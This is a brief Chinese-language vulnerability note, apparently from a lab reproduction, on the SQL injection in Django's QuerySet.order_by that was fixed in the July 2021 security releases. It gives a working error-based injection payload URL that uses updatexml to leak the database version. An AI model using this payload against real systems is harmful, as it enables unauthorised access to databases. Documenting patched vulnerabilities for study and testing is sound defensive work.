漏洞描述
Django 于 2021年7月1日發布了一個安全更新,修復了函數QuerySet.order_by中的 SQL 注入漏洞。
參考鏈接:
- Django security releases issued: 3.2.5 and 3.1.13 | Weblog | Django
該漏洞需要開發人員使用order_by功能。此外,還可以控制查詢集的輸入。
漏洞環境及利用
搭建docker環境
payload
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23
?
